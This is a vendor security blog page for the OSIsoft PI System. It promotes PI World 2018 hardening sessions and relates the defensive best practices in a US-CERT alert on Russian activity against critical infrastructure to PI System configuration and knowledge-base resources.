Skip navigation
All Places > Security > Blog > 2018 > March
2018

There are a couple options to learn about PI System hardening on day 3 of PI World 2018. 

  1. The session Extreme PI System Hardening in developer track 4 at 10:30 AM is a “How-To” session that will take you step by step through hardening a system from the ground up.
  2. The PI System Anti-Hackathon lab on at 1:30 PM is a “Hands-On” session where you can learn about system hardening by experimenting in a sandbox environment with experts to guide you.

Both sessions will make heavy use of the PI Security Audit Tools.  Many are familiar with the audit module of the PI Security Audit Tools, which is used to identify gaps between the current state of a system and best practices.  At PI World 2018, we will introduce the PI Security DSC module which enables PI System administrators to manipulate the security configuration of their PI System components with PowerShell Desired State Configuration (DSC). By leveraging this module, PI System hardening can be implemented in a “configuration as code” paradigm.

Why use DSC for your PI System, you ask?

  • It’s declarative, separating intent, “What do I want to do?” from execution, “How do I want to do it?” This results in:
    • Less complex automation
    • More agility
    • Consistency across environments
    • Functional documentation
  • It’s broadly applicable, allowing you to cover broad scope with the same technology:
    • Use with applications and the underlying OS
    • Establish baselines or harden systems

Want to know more?  Full descriptions for each PI World session below!

 

How-To: Extreme PI System Hardening (Developer Track Presentation)

High value systems warrant hardcore hardening measures. The PI System resides at a critical junction, communicating across strict network boundaries. Under this paradigm, the PI System acts as a 'safe harbor' for data, defending critical systems by reducing the number of users inside the security perimeter while enabling growth in the number of users getting value from OT data. An application can only be as secure as its operating platform, so this session will start from the ground up. We will establish a solid foundation with advanced hardening measures for the Windows operating system that OSIsoft has collected over many years working with the platform, such as security baselines, PowerShell’s Desired State Configuration, and arcane corners of the Windows Advanced Firewall. With the platform locked down, we will explore application hardening measures built within and tailored to the PI System. Emphasis will be on using the latest technology and tools available to embrace agility and configuration as code. Examples from session demos will be available on GitHub for administrators who want to try them at home.

 

Hands-On: PI System Anti-Hackathon (PI System Admin Lab)

In this lab you will be served a big, soggy mess of a PI system – it’s your job to whip it into shape, by applying modern security techniques and best practices. You will have some help - handy scripts to identify the security holes are, references, resources, tips and coaching to help you accomplish your task. Participants will earn points based on the amount and the severity of security issues addressed. At the end of the lab, prizes will be awarded to top scorers. Moderately experienced administrators may have an advantage, but participants at all experience levels will learn concepts applicable to their systems back home.

 

Go here to register for the PI System Anti-Hackathon lab today!

US-CERT released the alert, Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors, on Thursday, March 15th.  The technical alert includes indicators of compromise (IOCs), technical details on the tactics, techniques, and procedures (TTPs) used by the actors, and security best practices relevant to the campaign. DHS and FBI published this alert with the expressed goal of empowering defenders to reduce their exposure to malicious activity.

 

Though the Systems Affected section of the alert explicitly identifies Domain Controllers, File Servers, and Email Servers as in scope, many of the defensive measures are relevant to the PI System as well.  The goal of this post is to highlight the measures in the General Best Practices Applicable to this Campaign section of the alert that are relevant to the PI System and point to resources that may assist with defensive efforts.

 

“Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.”

  • PI System core functionality does NOT require SMB, however SMB is a default feature of Windows and may be enabled on your system.  For guidance on SMB and the PI System, see AL00318, WannaCry Ransomware Attack FAQ.

 

“Segment any critical networks or control systems from business systems and networks according to industry best practices.”

 

“Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.”

  • Most PI System administration tasks for the PI Data Archive and PI AF Server can be performed remotely with the PI System Management Tools, PowerShell Tools for the PI System, or PI System Explorer over PINet.  For remote administration to the OS, the MSDN blog post PowerShell Security at Enterprise Customers  is a comprehensive overview of the security features that make PowerShell the best choice.  Given the manageability and security benefits, we recommend installing the PI Server on the latest release of Windows Server Core and performing remote administration via PowerShell.

 

“Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.”

  • We recommend installing PI Vision on the latest version of Windows Server Core for the reduced attack surface area.  Additionally, guidance for web security in PI Vision is covered in KB01631.

 

“Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.”

  • Guidance for configuring application whitelisting on systems with PI applications using AppLocker is provided in  KB00994.

 

“Block RDP connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.”

 

“Ensure applications are configured to log the proper level of detail for an incident response investigation.”

  • Default configuration provides significant information.  See PI Data Archive monitoring in the LiveLibrary for more details on all PI Data Archive monitoring capabilities through PI Message Logs, Connection history and Windows performance counters.  PI System administrators can opt into PI Auditing, which records the data that is added, edited, or removed from database files, as well as other events or changes to configuration that occur in the PI Data Archive to satisfy FDA Title 21 CFR Part 11 auditing requirements.  See Auditing the PI Data Archive in the LiveLibrary for more information.  Enabling PI Audit is not recommended unless the default monitoring is insufficient.  PI AF Server client connectivity logging is covered in KB00412.   PI AF Audit Trail is described in the Audit Trail implementation  section of the LiveLibrary.

 

“Consider implementing HIPS or other controls to prevent unauthorized code execution.”

  • There are no known compatibility issues with Host Intrusion Prevention Systems and the PI System. Guidance for antivirus and antimalware solutions and the PI System provided in KB01062.

 

“Establish least-privilege controls.”

  • Permissions required for tasks in the LiveLibrary describes permissions required for common administration tasks. A practical role-based access implementation for Windows Integrated Security in the PI System is described in the PI Data Archive Field Service Technical Standard in KB01702.

 

“Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.”

  • Since the PI System leverages Windows authentication through PI Mappings, reset of Windows principals will impact PI System components.  In the event where this course of action needs to be taken, please contact tech support so that important aspects of recovery relevant to the PI System are not overlooked.

 

“Create and participate in information sharing programs.”

 

Hopefully the resources in this post help make the best practices relevant to this campaign more actionable for your PI System deployments.